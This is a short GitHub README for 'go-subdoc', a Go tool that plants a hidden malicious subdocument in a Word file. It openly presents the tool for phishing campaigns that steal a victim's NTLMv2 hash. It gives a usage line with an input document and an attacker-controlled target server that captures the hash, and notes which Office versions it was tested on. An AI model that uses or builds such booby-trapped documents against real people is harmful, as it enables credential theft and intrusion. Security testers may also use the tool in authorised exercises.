Skip to content

Latest commit

 

History

History
22 lines (17 loc) · 683 Bytes

README.md

File metadata and controls

22 lines (17 loc) · 683 Bytes

go-subdoc

A tool made in Go that injects a hidden malicious subdoc in a Word document.
This comes in handy on phishing campaigns for stealing the NTLMv2 hash of the victim.

Tested on Microsoft Office 2016 and 2019. Not guarateed to work on the latest Microsoft Office 365 version.

Usage

go-subdoc -input target.docx/docm -target example.com/127.0.0.1
  -input string
        Target document
  -target string
        Target server (only domain / ip address)

Please input only either a domain or an IP Address as the target. No UNC paths or locations.

References